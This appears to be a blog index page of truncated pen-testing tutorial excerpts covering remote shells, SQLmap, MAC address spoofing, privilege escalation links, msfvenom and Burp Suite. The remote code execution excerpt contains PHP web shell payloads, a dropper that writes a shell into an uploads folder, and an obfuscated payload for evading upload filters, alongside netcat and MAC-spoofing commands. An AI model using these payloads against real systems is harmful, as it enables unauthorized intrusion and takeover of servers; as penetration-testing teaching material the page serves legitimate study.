[ Pen Testing ] :: Step by Step: Uploading Shellcode and Upgrading the Shell

Getting a Remote Shell
Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target.
Netcat
You could just start a Netcat listener on the victim, if Netcat is available:
nc -lvnp 1234
… and start a shell on the attack …

[ Pen Testing ] :: Step by Step: Database Enumeration

Database Enumeration
Enumeration With SQLmap
SQLmap is noisy as hell. Here is the official options/examples page: https://github.com/sqlmapproject/sqlmap/wiki/Usage.
For example, save a captured header as an input file for SQLmap:
Load HTTP request from a file
Option: -r
One of the possibilities of sqlmap is loading of raw HTTP request from a textual file. That way …

[ Pen Testing ] :: Step by Step: Changing Your MAC Address

Hide Your Ass, Change Your MAC
Manually
ifconfig wlan0 down
ifconfig wlan0 hw ether f1:a7:12:34:1b:c1
ifconfig wlan0 up
With macchanger
ifconfig wlan0 down
# print your MAC
macchanger -s wlan0
# set your MAC
macchanger -m 11:22:33:44:55:66 wlan0
# set to a random vendor, random ID
macchanger -A wlan0
# set to your physical vendor, …

[ Pen Testing ] :: Step by Step: Linux Privilege Escalation

Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Local Linux Enumeration & Privilege Escalation Cheatsheet, an item-by-item list of the tests performed by LinEnum: https://www.rebootuser.com/?p=1623
LinEnum: https://github.com/rebootuser/LinEnum

[ Pen Testing ] :: Step by Step: msfvenom

Msfvenom creates shellcode from within Bash.
Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom
“Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/
And a good, thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html
Open Bash and enter:
msfvenom
to get a syntax page.
View a list of payloads:
msfvenom -l payloads
Create the reverse …

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Glenn Norman hacking

Remote Code Execution (RCE)
PHP RCE
Test a form for vulnerability to PHP RCE:
<?php phpinfo(); ?>
Get a remote PHP shell:
<?php system($_GET["c"]); ?>
<?php `$_GET["c"]`; ?>
Upload a file:
<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>
Evade file-type upload filters using rot13 + urlencode:
<?php $payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; file_put_contents('/var/www/html/uploads/testfile.php', str_rot13(urldecode($payload))); ?>
RCE via webshell
Pentest Monkey has …

[ Pen Testing ] :: Step by Step: Burp Suite

Burp Suite
Start with the basics: https://www.cybrary.it/s3ss10n/s3ss10n-wednesday-burp-suite-basics/
Use Burp to Test for Path Traversal Vulnerabilities: https://support.portswigger.net/customer/en/portal/articles/2590663-using-burp-to-test-for-path-traversal-vulnerabilities